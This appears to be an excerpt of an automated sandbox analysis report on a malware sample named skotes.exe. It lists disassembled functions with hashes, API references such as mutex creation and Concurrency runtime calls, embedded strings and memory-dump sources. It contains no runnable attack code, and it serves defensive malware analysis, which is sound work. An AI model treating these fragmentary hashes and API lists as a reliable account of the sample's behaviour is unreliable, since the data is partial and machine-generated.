Instruction Fuzzy Hash: 4D411D79A00719EBCB09DF64C898AADB7B6FF88310F14815DE90697790CB74AE01DF81

Function 0042E8DD Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0042E91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E9DC
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E9E4

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: e456b2d5945dcb9d16af89579036fa7bc11e47face3e2a4e749ba7397f49833a
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction Fuzzy Hash: A7418079B00219EFCB09DF65D454A6DB7B1FF48310F00816AE806A7391CB38AE41CF85

Function 020CA28D Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 020CA2D0
GetCurrentThread.KERNEL32 ref: 020CA2DA
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 020CA2E6

Part of subcall function 020C05EF: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 020C0601

Part of subcall function 020C0A7B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 020C0A82

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 020CA329

Part of subcall function 020CB779: SetEvent.KERNEL32(?,?,020CA32E,020CB0C2,00000000,?,00000000,020CB0C2,00000004,020CB76E,?,00000000,?,?,00000000), ref: 020CB7BD

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 020CA332

Part of subcall function 020CADA8: __EH_prolog3.LIBCMT ref: 020CADAF
Part of subcall function 020CADA8: List.LIBCONCRT ref: 020CADDE

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 020CA342

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityProxy::SchedulerThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::CountEventFixedH_prolog3ListResourceResource::Subscription
String ID:
API String ID: 701979363-0
Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction ID: 8c21eb6e8cfc52375b7e0df2557e5482d71a0824db60948515fca9812a502836
Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction Fuzzy Hash: 7D21ACB1600B189BCB25EF65D9909AEF3FAFF487007104A1EE84297660CB74F901DB95

Function 0042A026 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A069
GetCurrentThread.KERNEL32 ref: 0042A073
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A07F

Part of subcall function 00420388: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 0042039A

Part of subcall function 00420814: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 0042081B

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0042A0C2

Part of subcall function 0042B512: SetEvent.KERNEL32(?,?,0042A0C7,0042AE5B,00000000,?,00000000,0042AE5B,00000004,0042B507,?,00000000,?,?,00000000), ref: 0042B556

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A0CB

Part of subcall function 0042AB41: List.LIBCONCRT ref: 0042AB77

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A0DB

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityProxy::SchedulerThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::CountEventFixedListResourceResource::Subscription
String ID:
API String ID: 1533441822-0
Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction ID: 786c6bbc9f4db79065070eee32726b74de41850732c6b9a0a53a64165b4dd308
Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
Instruction Fuzzy Hash: 5721E031600B249FCB24EF66E9908ABF3F5FF48304740455EE942A7651CB38F805CB9A

Function 0043CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0043CC66

Strings

vC, xrefs: 0043CBE1

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vC
API String ID: 3213747228-1921080006
Opcode ID: 59c984e0335d750eb7e229aa4273084cd5aafbd0618d532e588fc2a2f53891da
Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
Opcode Fuzzy Hash: 59c984e0335d750eb7e229aa4273084cd5aafbd0618d532e588fc2a2f53891da
Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68

Function 020D519E Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,020D5195,020D3D59,020BB7BC,00462014,?,00000000,0044B3E8,000000FF,?,020A2691,?,?), ref: 020D51AC
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 020D51BA
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 020D51D3
SetLastError.KERNEL32(00000000,?,020D5195,020D3D59,020BB7BC,00462014,?,00000000,0044B3E8,000000FF,?,020A2691,?,?), ref: 020D5225

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
Instruction ID: 3875bbd59f230de7d24314b1cf72ac1c9669ceb62abecab719dfed6788ffb71f
Opcode Fuzzy Hash: 7eadf9bba742c64d85f45994d498b9432cfa87c48bb13d385963a09ab129d98a
Instruction Fuzzy Hash: 1701D83650BB216EE6562B757C84BAB2E8AEB027757200239FA24550E1FF924809F945

Function 020BFE82 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 020BFE90
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 020BFE96
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 020BFEC3
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 020BFECD
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 020BFEDF
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 020BFEF5

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
Instruction ID: aaeaa4cad83ffcd8936f62fd6928491d1776f7e5373727e090944298983a9d75
Opcode Fuzzy Hash: 0b9f535693bf9840a9ed197670659dc31b2ab51e471b9d9d389deb6254926a20
Instruction Fuzzy Hash: B601D83D50030666D762AB75EC0CBFF37A8EF41712B200425F415E3852DB24D5049B64

Function 020E2959 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 020E29C3
_free.LIBCMT ref: 020E29B1

Part of subcall function 020DB05C: HeapFree.KERNEL32(00000000,00000000,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?), ref: 020DB072
Part of subcall function 020DB05C: GetLastError.KERNEL32(?,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?,?), ref: 020DB084

_free.LIBCMT ref: 020E2B7D

Strings

XgE, xrefs: 020E2AE0
XgE, xrefs: 020E296C, 020E2972

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: XgE$XgE
API String ID: 2155170405-1765908331
Opcode ID: c6433087ed30f2a2da2807838542e42bb6de4ad70922db091af99d7f7348fe1d
Instruction ID: 9ef4281b5726843d3db9d202c760f09fc2182c40b54997f6d76c09aa72cd4ddc
Opcode Fuzzy Hash: c6433087ed30f2a2da2807838542e42bb6de4ad70922db091af99d7f7348fe1d
Instruction Fuzzy Hash: 6751E5B1900319AFDF25EF74DC809EE77FDAF44314B15026AD812A7290E7709A81EF55

Function 00439019 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

5Y, xrefs: 0043906A
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0043905C, 00439099
8_^, xrefs: 004390EE, 00439131

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 8_^$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe$5Y
API String ID: 0-2405408147
Opcode ID: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
Instruction ID: 5a6a14289eafe60ce2143b443f35f28c3b9330844cb9aa4b0d6a2bcf37f19cd6
Opcode Fuzzy Hash: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
Instruction Fuzzy Hash: B841A571A00219AFDB159F9ACC859AFBBF8EB8D310F10106BE404A7351E7F48E41CB59

Function 0043182A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431885
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318A4
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004318EB

Strings

pContext, xrefs: 0043189C

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
Instruction ID: d01a77f2ab9abe46547ca181dc4035302de0eae64105b64324a031690df06c10
Opcode Fuzzy Hash: e9b064e3ffac3daba16c5b096d74077ea667223e78b02618e4975b94426a83e1
Instruction Fuzzy Hash: 3421EA35B006159BCB19B765D895ABD73A5BF98338F04112BE411872E1CB6CAC428A9D

Function 020DE24A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 020DE24F

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-1726044199
Opcode ID: 83d649548dc4756340e3f4fa4cdfd0894265a7358bbde176a04f29cefd39949e
Instruction ID: 487161d1da7e8e4688cb4f820dbcebcb97cc147d11d421b22f4a9e6de863a555
Opcode Fuzzy Hash: 83d649548dc4756340e3f4fa4cdfd0894265a7358bbde176a04f29cefd39949e
Instruction Fuzzy Hash: D2218071642305AFDB61AF65DCC4EBBB7EEEE003647004624F9259A550EB20EC50ABA0

Function 020C9EFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 020C9F03
std::bad_exception::bad_exception.LIBCMT ref: 020C9F65
Concurrency::SchedulerPolicy::_ResolvePolicyValues.LIBCONCRT ref: 020C9FA7
std::bad_exception::bad_exception.LIBCMT ref: 020C9FD1

Strings

8[F, xrefs: 020C9F62, 020C9F6F

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_ResolveSchedulerValues
String ID: 8[F
API String ID: 3836581985-331943168
Opcode ID: a4d644558bc095dc33be146fbd05eccc5a98fec7c23d9a48cae62212641850da
Instruction ID: c0c44bc70e3924e290b9c2cb46d05e2a7b3fdef38e1df6fa12fadac259e18729
Opcode Fuzzy Hash: a4d644558bc095dc33be146fbd05eccc5a98fec7c23d9a48cae62212641850da
Instruction Fuzzy Hash: 2B21C1B29003089FDB16EFA4D885AEDB7B5EF04320B30402EE505AB250DB70AD06EF55

Function 0043727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 004372BE

Strings

.exe, xrefs: 004372CB
.bat, xrefs: 004372ED
.com, xrefs: 004372FE
.cmd, xrefs: 004372DC

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
Instruction ID: 2fe954d65b4b50834951edb994104e0446c73801206968c056bf44c713a15be5
Opcode Fuzzy Hash: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
Instruction Fuzzy Hash: 8D01086760861635663520199E0276713888BCABB8F25202FFDA4F73C1EF8CDD42A1EC

Function 020DA8D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,020D6BB1,?,?,?,?,020D78C8,?), ref: 020DA8DD
_free.LIBCMT ref: 020DA93A
_free.LIBCMT ref: 020DA970
SetLastError.KERNEL32(00000000,00462170,000000FF,?,?,020D6BB1,?,?,?,?,020D78C8,?), ref: 020DA97B

Strings

x!F, xrefs: 020DA963

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
Instruction ID: bdd8446e85cfe5af3c9303e2c2aead200a5d167c8c9d756ec8aa1d979f897476
Opcode Fuzzy Hash: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
Instruction Fuzzy Hash: 98112C363077007EC76223745C80EBA729BABC17BDB670234F224920E0EEA68C017915

Function 0043A671 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0043694A,?,?,?,?,00437661,?), ref: 0043A676
_free.LIBCMT ref: 0043A6D3
_free.LIBCMT ref: 0043A709
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0043694A,?,?,?,?,00437661,?), ref: 0043A714

Strings

x!F, xrefs: 0043A6FC

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
Instruction ID: 8cce909c9ac14f6c448446a217854be9d18c12721b99b88a770a56678c5f8ba9
Opcode Fuzzy Hash: 4f2ed3d34f35961fd0f18177c3173820742fc9700b75869c829352158ce47360
Instruction Fuzzy Hash: 2511AB312447007A961166766C86A2B215AD7D937DF24213FF3A4462D2EEAD8C32515F

Function 020DAA2F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,020D7862,020A24AE), ref: 020DAA34
_free.LIBCMT ref: 020DAA91
_free.LIBCMT ref: 020DAAC7
SetLastError.KERNEL32(00000000,00462170,000000FF,?,020D7862,020A24AE), ref: 020DAAD2

Strings

x!F, xrefs: 020DAABA

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
Instruction ID: 486359754fe0052b50b5fe536a49cd06ade5a0448d1893f69044a84aa53a6e47
Opcode Fuzzy Hash: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
Instruction Fuzzy Hash: FD11E9363077007EDB52677C5D80EBA339AABC1778B550335F214921E0EFA68C056915

Function 0043A7C8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004375FB,00402247), ref: 0043A7CD
_free.LIBCMT ref: 0043A82A
_free.LIBCMT ref: 0043A860
SetLastError.KERNEL32(00000000,00000008,000000FF,?,004375FB,00402247), ref: 0043A86B

Strings

x!F, xrefs: 0043A853

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!F
API String ID: 2283115069-3062043068
Opcode ID: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
Instruction ID: 43a0ef826740dec3b5b6cec3c960c44763b9b2bf66f2e005ed7dcd0d28945869
Opcode Fuzzy Hash: 56f9d83506fe0b5766636a44d0cab5e527ac01f444b2ac40f8d129dc50e40d0b
Instruction Fuzzy Hash: 0A1106312847003A961132765CC5E6B221AEBC977DF24223BF764822D2EFAECC23415F

Function 020D22FE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 020D231E
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 020D232F
StructuredWorkStealingQueue.LIBCMT ref: 020D2365
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 020D2376

Strings

e, xrefs: 020D2340

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 732f51dcc0545dea61ba9411d8760fd4b085c363898bf797b7d3dd23a6c88dcd
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 19119131102305EFDB56DE68C880AAE77A9AF02315B14C1A9EC069F213DB71D905EFA4

Function 00432097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 004320B7
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004320C8
StructuredWorkStealingQueue.LIBCMT ref: 004320FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043210F

Strings

e, xrefs: 004320D9

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 1ff5ec0336f97ae43b1f0b8f375a3bc5f2b05840f56227257267f5d03aa7fa4d
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 9411C131200104ABDF45DE69CB8166B73A4AF0A328F14D05BFD068F242DBF9D905CB99

Function 020AABC7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 020AABCA
CreateMutexA.KERNEL32(00000000,00000000,00463254), ref: 020AABE8
GetLastError.KERNEL32 ref: 020AABF0
GetLastError.KERNEL32 ref: 020AAC01

Strings

T2F, xrefs: 020AABD7

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutexSleep
String ID: T2F
API String ID: 3645482037-3862687658
Opcode ID: 187082659592547e38ccbb39052786932d1335d10d1d45dc72119e21490735fa
Instruction ID: 6be993acf1441cb5e75c817f1e6df1a4ab8e112ac7912158ae16374078a9729e
Opcode Fuzzy Hash: 187082659592547e38ccbb39052786932d1335d10d1d45dc72119e21490735fa
Instruction Fuzzy Hash: 4901F431680340EBE7509FA8FC08F5A77B5E740B22F500A36F515C35D0DB789944CB69

Function 0043656D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00436562,?,?,0043652A,?,?,?), ref: 00436582
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00436595
FreeLibrary.KERNEL32(00000000,?,?,00436562,?,?,0043652A,?,?,?), ref: 004365B8

Strings

mscoree.dll, xrefs: 0043657B
CorExitProcess, xrefs: 0043658D

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
Instruction ID: dbc2b550f678300173dffafd29bb25114a02185772f501870b49608a3602ef38
Opcode Fuzzy Hash: 149a4b1e0247f71675fe1653e9c2ac55fef454062cb741321ed7f61413657623
Instruction Fuzzy Hash: C4F01235941319FBDB129B50ED0EB9E7A79EB04757F154072F805A22A1CB78CF04DB98

Function 0041D199 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0041D136,00000064), ref: 0041D1BC
RtlLeaveCriticalSection.NTDLL(00465750), ref: 0041D1C6
WaitForSingleObjectEx.KERNEL32(00468680,00000000,?,0041D136,00000064,?,75570F00,?,004075ED,00468680), ref: 0041D1D7
RtlEnterCriticalSection.NTDLL(00465750), ref: 0041D1DE

Strings

PWF, xrefs: 0041D1C0

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID: PWF
API String ID: 3269011525-4189640852
Opcode ID: 797b37c2cabad88e9ba561759b38bac6fac545db67df0b7ba0c67b1f35825c1a
Instruction ID: 46656ffccb6e8e596dcc74b2c483e7fba3308dd0c831886d2789c24014a254a2
